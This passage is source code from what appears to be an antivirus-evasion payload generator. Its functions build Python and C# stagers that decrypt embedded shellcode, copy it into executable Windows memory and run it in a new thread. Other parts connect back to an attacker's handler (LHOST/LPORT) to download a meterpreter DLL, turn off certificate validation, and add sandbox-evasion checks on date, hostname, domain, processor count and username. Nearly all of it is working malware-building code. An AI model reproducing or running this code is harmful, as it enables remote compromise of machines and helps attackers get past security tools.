DES\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n' payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n' payload_code += '\t' * num_tabs_required 
+ randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' elif self.required_options["INJECT_METHOD"][0].lower() == "heap": # Generate Random Variable Names HeapVar = evasion_helpers.randomString() # Create Payload File payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import DES\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n' payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n' payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + 
'.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # randomize all of the variable names used shellCodeName = evasion_helpers.randomString() socketName = evasion_helpers.randomString() getDataMethodName = evasion_helpers.randomString() fdBufName = evasion_helpers.randomString() rcvStringName = evasion_helpers.randomString() rcvCStringName = evasion_helpers.randomString() injectMethodName = evasion_helpers.randomString() tempShellcodeName = evasion_helpers.randomString() shellcodeBufName = evasion_helpers.randomString() fpName = evasion_helpers.randomString() tempCBuffer = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() payload_code = "import struct, socket, binascii, ctypes as " + randctypes + ", random, time\n" # How I'm tracking the number of nested tabs needed # to make the payload num_tabs_required = 0 if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Create Payload code payload_code += '\t' * num_tabs_required + 'from datetime import datetime\n' payload_code += '\t' * num_tabs_required + 'from datetime import date\n' payload_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n' payload_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' payload_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["HOSTNAME"][0].lower() != "x": rand_hostname = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import platform\n' payload_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n' payload_code += '\t' * num_tabs_required + 'if \"' + self.required_options["HOSTNAME"][0].lower() + '\" in ' + rand_hostname + '.lower():\n' # Add a tab 
for this check num_tabs_required += 1 if self.required_options["DOMAIN"][0].lower() != "x": rand_domain = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import socket\n' payload_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n' payload_code += '\t' * num_tabs_required + 'if \"' + self.required_options["DOMAIN"][0].lower() + '\" in ' + rand_domain + '.lower():\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["PROCESSORS"][0].lower() != "x": rand_processor_count = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import multiprocessing\n' payload_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n' payload_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + self.required_options["PROCESSORS"][0] + ':\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import getpass\n' payload_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n' payload_code += '\t' * num_tabs_required + 'if \'' + self.required_options["USERNAME"][0].lower() + '\' in ' + rand_user_name + '.lower():\n' # Add a tab for this check num_tabs_required += 1 # socket and shellcode variables that need to be kept global payload_code += '\t' * num_tabs_required + "%s, %s = None, None\n" % (shellCodeName,socketName) # build the method that creates a socket, connects to the handler, # and downloads/patches the meterpreter .dll payload_code += '\t' * num_tabs_required + "def %s():\n" %(getDataMethodName) payload_code += '\t' * num_tabs_required + "\ttry:\n" payload_code += '\t' * num_tabs_required + "\t\tglobal %s\n" %(socketName) # build the socket and connect to the handler payload_code += '\t' * num_tabs_required + "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" 
%(socketName) payload_code += '\t' * num_tabs_required + "\t\t%s.connect(('%s', %s))\n" %(socketName,self.required_options["LHOST"][0],self.required_options["LPORT"][0]) # pack the underlying socket file descriptor into a c structure payload_code += '\t' * num_tabs_required + "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,socketName) # unpack the length of the payload, received as a 4 byte array from the handler payload_code += '\t' * num_tabs_required + "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(socketName) payload_code += '\t' * num_tabs_required + "\t\t%s = b\" \"\n" % (rcvStringName) # receive ALL of the payload .dll data payload_code += '\t' * num_tabs_required + "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, socketName) payload_code += '\t' * num_tabs_required + "\t\t" + rcvCStringName + " = " + randctypes + ".create_string_buffer(%s, len(%s))\n" % (rcvStringName,rcvStringName) # prepend a little assembly magic to push the socket fd into the edi register payload_code += '\t' * num_tabs_required + "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName) # copy the socket fd in payload_code += '\t' * num_tabs_required + "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName) payload_code += '\t' * num_tabs_required + "\t\treturn %s\n" % (rcvCStringName) payload_code += '\t' * num_tabs_required + "\texcept: return None\n" # build the method that injects the .dll into memory payload_code += '\t' * num_tabs_required + "def %s(%s):\n" %(injectMethodName,tempShellcodeName) payload_code += '\t' * num_tabs_required + "\tif %s != None:\n" %(tempShellcodeName) payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": # allocate enough virtual memory to stuff the .dll in payload_code += "\t\t" + fpName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + 
randctypes + ".c_int(len(" + shellcodeBufName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n" # virtual lock to prevent the memory from paging out to disk payload_code += "\t\t" + tempCBuffer + " = (" + randctypes + ".c_char * len(" + shellcodeBufName + ")).from_buffer(" + shellcodeBufName + ")\n" # copy the .dll into the allocated memory payload_code += "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + fpName + "), " + tempCBuffer + ", " + randctypes + ".c_int(len(" + shellcodeBufName + ")))\n" # kick the thread off to execute the .dll payload_code += "\t\tht = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + fpName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" # wait for the .dll execution to finish payload_code += "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(ht)," + randctypes + ".c_int(-1))\n" # Assume HEAP Injection else: HeapVar = evasion_helpers.randomString() handleName = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + shellcodeBufName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + "\t\t" + fpName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + shellcodeBufName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + tempCBuffer + ' = (' + randctypes + '.c_char * len(' + shellcodeBufName + ')).from_buffer(' + shellcodeBufName + ')\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + fpName + '),' + tempCBuffer + 
',' + randctypes + '.c_int(len(' + shellcodeBufName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + fpName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n' # download the stager payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName) # inject what we grabbed payload_code += "%s(%s)\n" % (injectMethodName, shellCodeName) if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # imports and namespace setup payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n" payload_code += "namespace %s { class %s {\n" % ( evasion_helpers.randomString(), evasion_helpers.randomString()) # code for the randomString() function randomStringName = evasion_helpers.randomString() bufferName = evasion_helpers.randomString() charsName = evasion_helpers.randomString() t = list( "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789") random.shuffle(t) chars = ''.join(t) # logic to turn off certificate validation validateServerCertficateName = evasion_helpers.randomString() payload_code += "private static bool %s(object sender, System.Security.Cryptography.X509Certificates.X509Certificate cert,System.Security.Cryptography.X509Certificates.X509Chain chain,System.Net.Security.SslPolicyErrors sslPolicyErrors) { return true; }\n" % ( validateServerCertficateName) # code for the randomString() method payload_code += "static string %s(Random r, int s) {\n" % ( randomStringName) payload_code += "char[] %s = new char[s];\n" % (bufferName) payload_code += "string %s = \"%s\";\n" % (charsName, chars) payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % ( bufferName, charsName, charsName) payload_code += "return new string(%s);}\n" % (bufferName) # code for the checksum8() function checksum8Name = evasion_helpers.randomString() payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % ( checksum8Name) # code fo the genHTTPChecksum() function genHTTPChecksumName = evasion_helpers.randomString() baseStringName = evasion_helpers.randomString() randCharsName = evasion_helpers.randomString() urlName = evasion_helpers.randomString() random.shuffle(t) randChars = ''.join(t) payload_code += "static string %s(Random r) { string %s = \"\";\n" % ( genHTTPChecksumName, baseStringName) 
payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % ( baseStringName, randomStringName) payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % ( randCharsName, randChars) payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % ( randCharsName) payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName, randCharsName) payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % ( checksum8Name, urlName, urlName) # code for getData() function getDataName = evasion_helpers.randomString() strName = evasion_helpers.randomString() webClientName = evasion_helpers.randomString() sName = evasion_helpers.randomString() payload_code += "static byte[] %s(string %s) {\n" % (getDataName, strName) payload_code += "ServicePointManager.ServerCertificateValidationCallback = %s;\n" % ( validateServerCertficateName) payload_code += "WebClient %s = new System.Net.WebClient();\n" % ( webClientName) payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % ( webClientName) payload_code += "byte[] %s = null;\n" % (sName) payload_code += "try { %s = %s.DownloadData(%s);\n" % ( sName, webClientName, strName) payload_code += "if (%s.Length < 100000) return null;}\n" % (sName) payload_code += "catch (WebException) {}\n" payload_code += "return %s;}\n" % (sName) # code fo the inject() function to inject shellcode injectName = evasion_helpers.randomString() sName = evasion_helpers.randomString() funcAddrName = evasion_helpers.randomString() hThreadName = evasion_helpers.randomString() threadIdName = evasion_helpers.randomString() pinfoName = evasion_helpers.randomString() if 
self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, sName) payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( sName, funcAddrName, sName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % ( hThreadName) payload_code += " UInt32 %s = 0;\n" % (threadIdName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName) payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( pinfoName, sName) payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( funcAddrName, pinfoName, sName) payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( funcAddrName, sName, sName) payload_code += ' UInt32 {} = 0;\n'.format(threadIdName) payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, funcAddrName, threadIdName) payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format( hThreadName) # code for Main() to launch everything sName = evasion_helpers.randomString() randomName = evasion_helpers.randomString() curlyCount = 0 payload_code += "static void Main(){\n" if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() # Create Payload code payload_code += '\t' * curlyCount + 'DateTime {} = DateTime.Today;\n'.format( RandToday) payload_code += 
'\t' * curlyCount + 'DateTime {} = {}.AddDays({});\n'.format( RandExpire, RandToday, self.required_options["EXPIRE_PAYLOAD"][0]) payload_code += '\t' * curlyCount + 'if ({} < {}) {{\n'.format( RandExpire, RandToday) # Add a tab for this check curlyCount += 1 if self.required_options["HOSTNAME"][0].lower() != "x": payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format( self.required_options["HOSTNAME"][0].lower()) # Add a tab for this check curlyCount += 1 if self.required_options["DOMAIN"][0].lower() != "x": payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n' # Add a tab for this check curlyCount += 1 if self.required_options["PROCESSORS"][0].lower() != "x": payload_code += '\t' * curlyCount + 'if (System.Environment.ProcessorCount > {}) {{\n'.format( self.required_options["PROCESSORS"][0]) # Add a tab for this check curlyCount += 1 if self.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() rand_char_name = evasion_helpers.randomString() payload_code += '\t' * curlyCount + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format( rand_user_name) payload_code += '\t' * curlyCount + "string[] {} = {}.Split('\\\\');\n".format( rand_char_name, rand_user_name) payload_code += '\t' * curlyCount + 'if ({}[1].Contains("{}")) {{\n\n'.format( rand_char_name, self.required_options["USERNAME"][0]) # Add a tab for this check curlyCount += 1 payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % ( randomName) payload_code += "byte[] %s = %s(\"https://%s:%s/\" + %s(%s));\n" % ( sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0], genHTTPChecksumName, randomName) payload_code += "%s(%s);}\n" % (injectName, sName) while (curlyCount != 0): payload_code += '\t' * curlyCount + '}' curlyCount -= 1 # get 12 random variables for 
the API imports r = [evasion_helpers.randomString() for x in range(12)] y = [evasion_helpers.randomString() for x in range(17)] if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) if self.required_options["USE_ARYA"][0].lower() == "y": payload_code = encryption.arya(payload_code) self.payload_source_code = payload_code return
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # Base64 Encode Shellcode Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:]) Shellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii') # randomize all our variable names, yo' namespaceName = evasion_helpers.randomString() className = evasion_helpers.randomString() bytearrayName = evasion_helpers.randomString() funcAddrName = evasion_helpers.randomString() shellcodeName = evasion_helpers.randomString() hThreadName = evasion_helpers.randomString() threadIdName = evasion_helpers.randomString() pinfoName = evasion_helpers.randomString() num_tabs_required = 0 # get 12 random variables for the API imports r = [evasion_helpers.randomString() for x in range(12)] y = [evasion_helpers.randomString() for x in range(17)] #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n" payload_code += "namespace %s { class %s {\n" % (namespaceName, className) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif 
self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) payload_code += "static void Main() {\n" payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 num_tabs_required += 2 payload_code += '\t' * num_tabs_required + "string %s = System.Text.ASCIIEncoding.ASCII.GetString(Convert.FromBase64String(\"%s\"));" % ( bytearrayName, Shellcode) payload_code += '\t' * num_tabs_required + "string[] chars = %s.Split(',').ToArray();\n" % ( bytearrayName) payload_code += '\t' * num_tabs_required + "byte[] %s = new byte[chars.Length];\n" % ( shellcodeName) payload_code += '\t' * num_tabs_required + "for (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); }\n" % ( shellcodeName) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, shellcodeName) payload_code += '\t' * num_tabs_required + "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( shellcodeName, funcAddrName, shellcodeName) payload_code += '\t' * num_tabs_required + "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % ( hThreadName, threadIdName, pinfoName) payload_code += '\t' * num_tabs_required + "%s = 
CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += '\t' * num_tabs_required + "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" % ( hThreadName) # payload_code += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": rand_heap = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_var = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( rand_heap, bytearrayName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( rand_ptr, rand_heap, bytearrayName) payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( rand_ptr, bytearrayName, bytearrayName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format( rand_var) payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, rand_ptr, rand_var) payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);}}\n'.format( hThreadName) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 if self.required_options["USE_ARYA"][0].lower() == "y": payload_code = encryption.arya(payload_code) self.payload_source_code = payload_code return
def generate(self): # Generate the variable names randctypes = evasion_helpers.randomString() ShellcodeVariableName = evasion_helpers.randomString() RandPtr = evasion_helpers.randomString() RandHt = evasion_helpers.randomString() RandEncShellCodePayload = evasion_helpers.randomString() known_plaintext_string = evasion_helpers.randomString() plaintext_string_variable = evasion_helpers.randomString() key_guess = evasion_helpers.randomString() secret_key = evasion_helpers.randomString() small_constrained_key_variable = evasion_helpers.randomString() decoded_ciphertext = evasion_helpers.randomString() decoded_known = evasion_helpers.randomString() decoded_shellcode = evasion_helpers.randomString() RandCipherObject = evasion_helpers.randomString() RandPadding = evasion_helpers.randomString() # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode payload_code, num_tabs_required = gamemaker.senecas_games(self) # encrypt the shellcode and get our randomized key encoded_ciphertext, constrained_key, encryption_key = encryption.constrained_aes(Shellcode) encoded_ciphertext = encoded_ciphertext.decode('ascii') # Use the secret we received earlier to encrypt our known plaintext string encrypted_plaintext_string = encryption.known_plaintext(encryption_key, known_plaintext_string) encrypted_plaintext_string = encrypted_plaintext_string.decode('ascii') if self.required_options["INJECT_METHOD"][0].lower() == "virtual": # Create Payload code payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n' payload_code += '\t' * 
num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + 'import os\n' payload_code += '\t' * num_tabs_required + small_constrained_key_variable + ' = \'' + constrained_key + '\'\n' payload_code += '\t' * num_tabs_required + RandPadding + ' = \'*\'\n' payload_code += '\t' * num_tabs_required + 'for ' + key_guess + ' in range(1000000, 10000000):\n' payload_code += '\t' * num_tabs_required + '\t' + secret_key + " = \"" + constrained_key + '\" + str(' + key_guess + ')\n' payload_code += '\t' * num_tabs_required + '\t' + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_ECB)\n' payload_code += '\t' * num_tabs_required + '\t' + decoded_ciphertext + ' = base64.b64decode(\'' + encrypted_plaintext_string + '\')\n' payload_code += '\t' * num_tabs_required + '\t' + decoded_known + ' = ' + RandCipherObject + '.decrypt(' + decoded_ciphertext + ').decode(\'ascii\')\n' payload_code += '\t' * num_tabs_required + '\t' + 'if ' + decoded_known + '.rstrip(\'*\') == \'' + known_plaintext_string + '\':\n' payload_code += '\t' * num_tabs_required + '\t\t' + decoded_shellcode + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n' payload_code += '\t' * num_tabs_required + '\t\t' + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + decoded_shellcode + ')\n' payload_code += '\t' * num_tabs_required + '\t\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n' payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * 